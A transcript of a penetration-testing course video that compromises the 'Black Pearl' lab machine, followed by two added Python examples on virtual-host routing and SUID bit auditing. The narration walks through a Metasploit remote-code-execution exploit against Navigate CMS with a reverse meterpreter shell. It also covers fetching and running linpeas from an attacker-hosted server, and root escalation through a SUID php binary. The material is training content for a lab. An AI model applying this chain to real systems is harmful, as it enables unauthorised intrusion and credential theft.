Welcome to this box titled Black Pearl. This box was created by Alec and is a Linux machine. Thank you, Alec, for creating this machine. We're going to go ahead and start off with our nmap scan as always. If you haven't found your IP address, go do that, get your nmap scan going; if you just want to follow and watch along and continue from here, that's fine too. Now our nmap scan only shows us here with port 22, DNS 53, and port 80.
As discussed in the past, 22 is likely not the option, so that really leaves us with 80, because 53 is likely not the option either, though it does come into play a little bit. Now we can see we have a default web page here just by looking at the title, this nginx, we have a Welcome to nginx, meaning if we go out to this website, we go 192.168.138.130, and I turn off my proxy and refresh, oops, and refresh, we get the Welcome to nginx page. So what do we need to do? We probably need to fuzz this and see where we can get with this information. So we're going to do a quick fuzz on this. Something else that's, I think, hidden in here, let me view the page source; it always helps to view the page source. In here you can see that there has been a little nice thing added in where it says alec@blackpearl.tcm, so that's your webmaster. Let me make it a little bit bigger: alec@blackpearl.tcm. This is a big hint giveaway, something we haven't covered quite yet, and we're just going to keep that in the back of our mind. But we know that we need to access this web page. We're going to go ahead and try to do some directory busting first and see if we can't get there with that. So let's go ahead and take a look at the directory busting and then we'll go from there.

So, new tab, we're going to do ffuf, do -w /usr/share/wordlists, this should be starting to feel a little bit familiar, right, dirbuster for me, and then just tab through to get to the medium list, and then go ahead and say FUZZ, and then we're just gonna do a -u with the IP address, for me it's 130, /FUZZ. Run that and see if we can't find anything, and immediately we get something called secret. So let's go ahead and go over to /secret. It's a file, let's go ahead and save that, let's open the containing folder and let's just open this, if we can, open up with Mousepad, and it said: oh my god you got root, just kidding, search somewhere else, directory busting won't give anything, this message is here so that you don't waste time directory busting this particular website. Alec. Okay, so what he's telling us is you're not going to find anything on this directory. Well, we're likely not going to find anything hunting down port 22; I mean, we could attack maybe alec at 22 with some weak passwords and see what we find, but that's not the entry port. And here we have 53, which means that this is running DNS, and it's running DNS for a reason. So we're going to do some recon on this.

What we're going to do is we're going to just say, and I'm actually going to run it over here, we're just going to use a tool called dnsrecon, and we're going to say -r, and that is for our range, of 127.0.0.0/24; we're just scanning the localhost because that's where our machine is, and then we're going to provide the IP address of the box that we're actually looking for, which is 130, and then for -d you can literally type in whatever you want, we just type in blah. -d is just needed there for a dictionary, but we're not going to use it, and it's still going to be able to find it; if we take it out it won't work, which I'll show you. Or -d for domain, I'm sorry, not dictionary, -d for domain. We're providing a domain, and it's gonna look for that domain, but if we don't provide it, it won't search, so it requires the domain. Even though we don't have the domain or don't know the domain, it's still able to find it. So what it found was 127.0.0.1 at blackpearl.tcm, which means that there's a DNS pointer record here to this web page. We need to go ahead and add that to our DNS in /etc/hosts. Okay, so what we can do is just nano /etc/hosts, and in here you can see that we have our 127.0.0.1 for localhost and 127.0.1.1 for kali. We need to add in the IP address 192.168.138.130; we're just creating a DNS record here for Black Pearl. So now we're going to say, hey, blackpearl.tcm allocates to this IP address, and the DNS is going to do its magic. So we're going to Ctrl+X, hit Y, hit Enter, and then in your web browser go ahead and close it completely if you had one open, and then we're going to go back, open it up, and hopefully this will work first go. So http://blackpearl.tcm. Okay, and if this happened correctly you should see this page. Okay, if for some reason it did not load for you, go ahead, go back, close this out again, give it a second, let it repopulate.

So here we are brought to this info page. Now we have seen this before, and again we can get some information disclosure here. We can see that we're up against a Linux box, we can see the name of the box, Debian system type; there might be some sort of execution we can run against this, but again, when we're up against a directory like this we want to do some directory brute forcing and see if maybe we can get access to this machine, or get access any further than what we are. So we're just going to want to fuzz the directory one more time and see if that leads to anything. As of right now this info page is giving us info, yes, but there might be more hiding under the covers. So we're going to go ahead and go back, and we're going to just use one more time /usr/share/wordlists, and I'm never going to get tired of saying that, dirbuster, I can type and then do my tabby thing. All right, so we're going to FUZZ here, and then this time around we're going to do a -u and we're going to do blackpearl.tcm, not the IP address, blackpearl, and we're going to say FUZZ, okay, and we're going to let this go through. We're going to look for anything that might show up, and immediately navigate shows up for us. So that's interesting, let's go ahead and just navigate to navigate, shall we? Okay, we've got Navigate CMS version 2.8, copyright 2021, and we're going to go ahead and just dig a little bit further into this. So my go-to is always Google: just, hey, Navigate CMS, we could look for exploit, we could also look for default credentials if there are any, see if we can go in there, but look at this, we've got unauthenticated remote code execution from Exploit Database. We can run it manually or we can run it with Metasploit, so that's nice, we have options. So actually the Exploit Database one is with Metasploit as well. I'm sure there is manual code out there, but for this one, since we haven't run Metasploit really much in the capstone, we're going to go ahead and mix it up and use a little bit of Metasploit here. Otherwise I encourage you to go back and try this manually as well, but we're going to go ahead and open up Metasploit and see what it's got to offer for us.

So msfconsole, let this load real quick, and this gives us the module in here, I mean we could search for it, but it's easier to just, honestly, just copy this. And we should probably verify. Okay, so this is tested against Navigate CMS 2.8; this module exploits insufficient sanitization in the database protect method and allows us to bypass all the authentication. The module then uses a path traversal vulnerability that allows authenticated users to upload PHP files; together we can get remote code execution. So it's chaining attacks here: first it's going and it's bypassing authentication, it's then uploading malware, which uses a path traversal vulnerability to do that via the authenticated user, and then uses that to do remote execution. So this is a chained attack here, this is pretty unique. So we're going to go ahead and go in here and just paste, hopefully this works, this is Metasploit 6 I'm on, and it does. Okay, so when we're in here we get to say options, and we're asked for our RHOST, we're asked for our port, we have our port, we're asked for our LHOST, which is fine, I think, and then all we need is to just set that. php/meterpreter/reverse_tcp looks good, I think. All we're going to do is just make sure we set our RHOSTS here, which is going to be 192.168.138.130, but we also need to set the server virtual host, so we're going to say set VHOST to blackpearl.tcm. Okay,
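The reason the IP address shows a stock nginx page while blackpearl.tcm shows the application, and the reason the module needs VHOST set, is virtual host routing: the server picks a site from the HTTP Host header, not from the IP the connection arrived on. The hosts-file entry only changes which Host header the browser sends. Here is an added self-contained demo of that behaviour (example code written for this write-up, not part of the course or the Black Pearl box); the vhost name, page bodies and the in-process server are constructed for the demo.

```python
"""Virtual host routing demo (added example, not from the course).

One IP address, one port, two sites: the server picks the site from the
HTTP Host header, which is why the IP alone shows a default page while
the hostname shows the application. Hostnames and pages are constructed.
"""
from __future__ import annotations

import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed vhost table: hostname -> page body. Any other Host value gets
# the default site, mirroring a default nginx server block.
VHOSTS = {
    "blackpearl.tcm": b"<h1>application page served for blackpearl.tcm</h1>",
}
DEFAULT_SITE = b"<h1>Welcome to nginx!</h1>"


class VHostHandler(BaseHTTPRequestHandler):
    def do_GET(self) -> None:
        # Strip an optional ":port" and ignore case, as real servers do.
        host = self.headers.get("Host", "").split(":")[0].lower()
        body = VHOSTS.get(host, DEFAULT_SITE)
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args) -> None:  # keep the demo quiet
        pass


def start_server() -> HTTPServer:
    """Bind to 127.0.0.1 on an ephemeral port and serve in a background thread."""
    srv = HTTPServer(("127.0.0.1", 0), VHostHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def fetch(srv: HTTPServer, host_header: str) -> bytes:
    """GET / from the server's IP, overriding only the Host header.

    This is what a hosts-file entry achieves: the TCP connection still goes
    to the same IP, but the request names the virtual host.
    """
    conn = http.client.HTTPConnection(*srv.server_address, timeout=5)
    conn.request("GET", "/", headers={"Host": host_header})
    resp = conn.getresponse()
    body = resp.read()
    conn.close()
    return body


def demo() -> tuple[bytes, bytes]:
    """Return (page seen by IP-only request, page seen by hostname request)."""
    srv = start_server()
    try:
        by_ip = fetch(srv, "127.0.0.1")          # what the IP-only request sees
        by_name = fetch(srv, "blackpearl.tcm")  # what the hostname request sees
    finally:
        srv.shutdown()
        srv.server_close()
    return by_ip, by_name


if __name__ == "__main__":
    ip_page, name_page = demo()
    print("by IP:  ", ip_page.decode())
    print("by name:", name_page.decode())
```

The same idea is why a directory scanner run against the bare IP finds nothing useful: it is only ever talking to the default site. Pointing the tool at the hostname (or supplying a Host header) is what reaches the second site.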
everything else looks good. This is automatic target; we could do a show targets real quick and see if there's any other targets, there's not, just automatic. This is our attacker IP address, that's fine, all ports fine, /navigate as the target URI looks fine. I always like to do options one more time, just get the visual of it. Everything looks good to me, so I'm gonna go ahead and just hit run, cross my fingers, hope and pray. Looks like we're getting a meterpreter session back, so let's hit enter. Might be rushing the process here a little bit, we'll see if it works, might take just a second to load. Okay, and from here we have a shell, so we can jump into a shell by typing shell, and in here we don't see anything, but if we do whoami you can see www-data, which means we're going to have to do privilege escalation again.

Now we are in this funky little area, we don't see like a shell, a normal shell type, right, we don't see like, hey, user@machinename, so we need to generate a TTY shell, and there's an easy way to do that. If you go out to Google, tty shell, if you just google that you'll see spawning a TTY shell. Now my favorite method of doing this is using Python, but we need to have Python on the machine, so you'll see what this does here in a second, but there's other ways to do it. Python's a quick way if Python is on the machine. So what we're going to do is just say which python, and you can see /usr/bin/python exists on this machine, so that's where it's calling out. We're going to go ahead and just copy this, and I'm going to modify this a little bit; I like /bin/bash over just sh, so I'm going to open this up in a notepad or a text editor, paste this in here, add a "ba" in front of that for bash, copy, and then we're going to go paste this into this shell. Okay, now that looks a little bit better, now we have an actual shell here.

So what we need to do is we need to again go through our privilege escalation capabilities. In this instance, running sudo -l, we can try, see what's there: sudo, command not found. Running history, we could see if anything's there, nothing great. So we need to check for privilege escalation, and we can do that using something like linPEAS, right, this should be familiar now. We're going to do a print working directory, I'm going to go ahead and cd over to /tmp because that's where I like to move things. We are in /tmp, and now what we're going to do is I'm just going to upload this file. So we're going to do a wget, and I don't have it hosted yet, but I'm just preparing it, so 192.168.138.131, attacker IP address, /linpeas.sh, and then linpeas.sh. This should be familiar now. We're going to come in here and we're going to do a Ctrl-plus here, we're going to go ahead and we're going to cd to transfer, you should have one of these by now, ls, linpeas should be in there. So all we're going to do is python3 -m simple, sorry, http.server, I'm thinking my Python 2 days, and port 80. Now we should be able to run this. Okay, let's go ahead and let's see if it actually generated. Did I call out linpeas? I did, let's see, ls, linpeas.sh. So I'm going to go ahead and just chmod +x linpeas.sh, ./linpeas.sh. Okay, now that's gonna run, so let's let this run for a second. I'm gonna pause the video, let it run through, and then we're gonna come back and look at the results.

Okay, so the results have come back, and we're gonna look at it from the bottom up this time, only because last time we took it from top down, we're gonna go bottom up. The top section is really very system heavy and what users are there, and it's a lot of good information, but at the same time we can kind of just skip down to the bottom and scroll up. Like here we're looking for usernames or passwords that might exist, and we're just kind of going through and trying to see if there's anything in here that we could find that would be relevant. Remember we're looking for red, and we're looking for red-yellow specifically, that would be good. I'm going to skip over some of this, and I'm looking for in particular some different things. Now if there's any sort of password or credential here, that could be interesting, if there's like a file named password or password credential, and you kind of learn what these are, you're really looking for something to stand out. None of these really stand out; these are all common kind of just paths on the system and common files on the system. Now if we keep scrolling up, what I'm looking for are any sort of interesting writable files, like here, /run/php, /run/lock, but we need to be able to have something that we can abuse the feature of; it has to be more than just writable. So again this is providing information, but it's not always going to be one specific thing. Now backup could be interesting, like there's backup files; it looks like this is specifically to the /var/www/navigate. There could be information in this backup folder, like there could be perhaps passwords or something in here, so this could be an area where we might want to look, just because there might be a password for a user, that user might be the root account password, we have no idea, so we kind of want to look at that. We do want to know what other users are on this computer, so starting at the top is not a bad idea. We could also just cat the /etc/passwd file and see what's going on there; in this instance we see root, we see www-data, there might be more users, we're not sure quite yet. Keep scrolling up, let's see if there's anything in here. Capabilities could be a possibility for us to look through; we'd have to look at GTFOBins and see. This is something that's a little bit beyond the scope of this course, but it is covered in the privesc courses. And we're gonna keep scrolling up, and this is where this gets a little bit interesting, especially when I start seeing unknown SUID binaries.

So let's talk through the SUID and the sticky bits and all that good stuff real quick. So this is actually a great example. So we're looking in here and we have what is called an SUID set. Now if you remember or recall from our early Linux lessons, we have file permissions, we have read, write, execute. Let's go down a little bit, like right here: read, write, execute. This is the root setting, okay, this is the owner setting, I should say, owner of the file. This is the setting read, blank, s, okay, this is actually SGID. This is, okay, let's pretend this says, let's pretend this says execute, like this right here: read, blank, execute. So this is the group setting; anybody belonging to this group has read and execute permissions, they do not have write permissions. Anybody in this one, okay, this is global, this is read, execute again. So we see here who's the owner of the file; when we're looking at all of these we see root owns all of these different binaries here, okay. Now let's talk about SUID. You see, instead of read, write, execute, we have read, write, s, okay? s is our SUID. This means that we can run this, and whenever we run this here, we have the ability to run this as the user that owns it. This is the SUID, we're on the root here, or the owner, sorry, we're on the owner, so we can run this as the person that owns it, which is root. Now you see down here what is called an SGID, which means we can run as the group, and that's sticky right here, or it's an s right here, I keep calling it sticky. Sticky bit is when it's in this, when you see an s in this area right here, for everybody else, that's called the sticky bit; here's SGID, in this group setting, and it's an SUID when we look at SUID. It's very interesting because we have root ownership, we can run this binary as root and abuse that feature.

Now there is a quick way to do this, and I can show you how the script is running this, but this is really just looking for permission settings. So we can come through and look, and if you ever go through a checklist you'll see something like this, where it's just doing a quick find command and it's looking to see if it can find the permission settings on these, okay. So permission is going to be 4000, and this is looking specifically for that SUID, and we're just going to put this to /dev/null here, and now you find all these in a much cleaner setting. So from our perspective, what we want to do is look at this, because not having the SUID enabled does not necessarily make it vulnerable, but we have a great website that we looked at earlier, GTFOBins, okay, gtfobins.github.io, and we can do something like this: we can come in here and say, okay, we've got SUID, and then maybe we want to start looking through some of these, like maybe, like, I don't know, mount for example. If we can come through, see if mount's in here, mount, but I'm looking right here, not there. newgrp, not there. php is there, even though it's 7.3, php is there, so maybe we want to open that. Like, switch user, su, I don't see it in here. And you would just go through this list and say, okay, does anything on this list stand out as being a privilege escalation? Now you are not expected to remember all these; there are some that you will see and it will stand out because you've done it time and time again, but for this situation this is absolutely what GTFOBins is built for. So we can scroll down over to SUID and click on it, and it says: if the binary has the SUID bit set, it does not drop the elevated privileges and may be abused to access the file system, escalate or maintain privilege as a SUID backdoor. If it is used to run sh -p, omit the -p argument on systems like Debian that allow the default sh shell to run. So it's giving us some instruction here, okay. So all we need to do on this is we just need to run the php and we need to run it with the rest of the setting here, okay, that's really it, and we're going to call out that binary specifically. So you copy this, come back in here, we see the binary is sitting in /usr/bin/php7.3, and it shouldn't matter that it's php7.3, just paste the selection. Okay, this is going to execute /bin/sh as the root user, giving us, hopefully, a root shell, which it gives us the euid of root, okay, which means even though it says we are uid of www-data and a group id of www-data, look at this euid. What we can do with this is cd to /root, ls, cat flag.txt. We are staying as the root user, but we're running in a shell that is executed by root, okay?

So it's a good job on this one. Finding the domain name may have been a little guessy, but the goal of this box is to teach about virtual host routing, which is used a lot on CTFs, which is true. And proof of concept here is you should be able to cat the /etc/shadow file, okay; prior to this we would not have been able to do that. Doesn't matter that when we write whoami, oh, we're actually showing as root, but our id is still staying as www-data, okay, but we are executing as root right now, so keep that in mind. We are the root user, we have owned this machine as the root user, and that's it. So SUID is a new lesson for you. Again, if you like this concept of privilege escalation, we are scratching the surface; there's so much to learn, there's always new tips and techniques out there. I encourage you, if you're interested in the CTF path, again to check out the escalation courses. If not, we're going to start moving into exploit development, we're going to start moving into some of the other stuff that's out there with the Active Directory pen testing and get more into the realistic stuff. So this is good foundational lessons, but I look forward to seeing you in the next video.

Well, everybody, that is it for this course. I really hope you enjoyed it. If you did, please do consider purchasing the other half of the course, the Practical Ethical Hacking course that is on our academy website. Tell a friend, have them come through this as well. Again, subscribe if you haven't, for more great hacking content, and I hope to see you again in another video very, very soon. Again, my name has been Heath Adams, aka The Cyber Mentor, and I have really enjoyed having you in this class. Until next time, peace out.
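Following up the SUID, SGID and sticky bit walkthrough from the Black Pearl section above, here is an added example (written for this write-up, not code from the course or from linPEAS) that reads the permission column of `ls -l`, reports the three special bits, applies the same test `find -perm -4000` applies, and works out which effective user and group an unprivileged caller such as www-data would get when running each file. That last part is the uid/euid split the video points out after running php. The listing at the bottom is constructed sample data, not output from the course machine.

```python
"""Interpreting setuid/setgid/sticky bits (added example, not course code).

Takes the permission column of `ls -l` ("-rwsr-xr-x") and reports the
special bits, whether `find -perm -4000` would list the file, and which
effective user/group an unprivileged caller would get. The listing at the
bottom is constructed for this example.
"""
from __future__ import annotations

import stat
from dataclasses import dataclass

# Position in "rwxrwxrwx" -> permission bit.
_BITS = [stat.S_IRUSR, stat.S_IWUSR, stat.S_IXUSR,
         stat.S_IRGRP, stat.S_IWGRP, stat.S_IXGRP,
         stat.S_IROTH, stat.S_IWOTH, stat.S_IXOTH]
# Execute slot -> (special bit shown there, letters that denote it).
_SPECIAL = {2: (stat.S_ISUID, "sS"), 5: (stat.S_ISGID, "sS"), 8: (stat.S_ISVTX, "tT")}


def parse_symbolic_mode(field: str) -> int:
    """Convert an ls -l mode field such as '-rwsr-xr-x' to mode bits.

    Lowercase s/t means the special bit plus execute; uppercase S/T means
    the special bit is set without execute permission.
    """
    perms = field[-9:]
    if len(perms) != 9:
        raise ValueError(f"bad mode field: {field!r}")
    mode = 0
    for i, ch in enumerate(perms):
        if ch == "-":
            continue
        if i in _SPECIAL and ch in _SPECIAL[i][1]:
            mode |= _SPECIAL[i][0]
            if ch.islower():
                mode |= _BITS[i]
        elif ch in "rwx":
            mode |= _BITS[i]
        else:
            raise ValueError(f"unexpected char {ch!r} in {field!r}")
    return mode


def matches_find_perm(mode: int, wanted: int = 0o4000) -> bool:
    """Same test as `find -perm -MODE`: every bit in MODE must be set."""
    return mode & wanted == wanted


def effective_ids(mode: int, owner: str, group: str,
                  caller: str, caller_group: str) -> tuple[str, str]:
    """Who the process runs as when `caller` executes the file."""
    euid = owner if mode & stat.S_ISUID else caller
    egid = group if mode & stat.S_ISGID else caller_group
    return euid, egid


@dataclass
class Finding:
    path: str
    owner: str
    suid: bool
    sgid: bool
    sticky: bool
    runs_as: tuple[str, str]


def audit_listing(lines, caller="www-data", caller_group="www-data"):
    """Parse `ls -l` lines and report what `caller` would run each file as."""
    findings = []
    for line in lines:
        parts = line.split()
        field, owner, group, path = parts[0], parts[2], parts[3], parts[-1]
        mode = parse_symbolic_mode(field)
        findings.append(Finding(
            path=path, owner=owner,
            suid=bool(mode & stat.S_ISUID),
            sgid=bool(mode & stat.S_ISGID),
            sticky=bool(mode & stat.S_ISVTX),
            runs_as=effective_ids(mode, owner, group, caller, caller_group),
        ))
    return findings


# Constructed listing (dates omitted; sizes and entries are illustrative).
SAMPLE_LS = [
    "-rwsr-xr-x 1 root root 4877496 /usr/bin/php7.3",
    "-rwxr-sr-x 1 root shadow 71816 /usr/bin/chage",
    "drwxrwxrwt 10 root root 4096 /tmp",
    "-rwxr-xr-x 1 root root 35000 /usr/bin/ls",
]

if __name__ == "__main__":
    for f in audit_listing(SAMPLE_LS):
        flags = "".join(c for c, on in (("s", f.suid), ("g", f.sgid), ("t", f.sticky)) if on) or "-"
        print(f"{f.path:18} owner={f.owner:5} special={flags:3} runs as {f.runs_as}")
```

For a live file, `stat.S_IMODE(os.stat(path).st_mode)` yields the same integer `matches_find_perm` expects, so the check can be run over a real file system without shelling out to find. From the defender's side, the interesting output is any row whose `runs_as` user differs from the caller: an interpreter like php with that property is what GTFOBins catalogues, and the fix is to clear the bit (`chmod u-s`) unless the program genuinely needs it.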